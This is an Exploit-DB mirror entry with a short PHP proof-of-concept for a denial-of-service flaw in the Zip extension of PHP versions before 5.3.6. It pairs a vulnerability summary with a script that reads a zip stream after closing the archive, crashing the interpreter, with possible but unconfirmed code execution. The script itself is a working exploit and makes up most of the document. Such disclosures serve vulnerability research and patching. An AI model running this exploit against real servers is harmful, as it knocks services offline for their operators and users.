exploit-db-mirror/exploits/php/dos/35484.php
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

34 lines
No EOL
731 B
PHP

source: https://www.securityfocus.com/bid/46969/info
PHP is prone to a remote denial-of-service vulnerability that affects the 'Zip' extension.
Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed.
Versions prior to PHP 5.3.6 are vulnerable.
<?php
$target_file = 'META-INF/MANIFEST.MF';
$za = new ZipArchive();
if ($za->open('test.jar') !== TRUE)
{
return FALSE;
}
if ($za->statName($target_file) !== FALSE)
{
$fd = $za->getStream($target_file);
}
else
{
$fd = FALSE;
}
$za->close();
if (is_resource($fd))
{
echo strlen(stream_get_contents($fd));
}
?>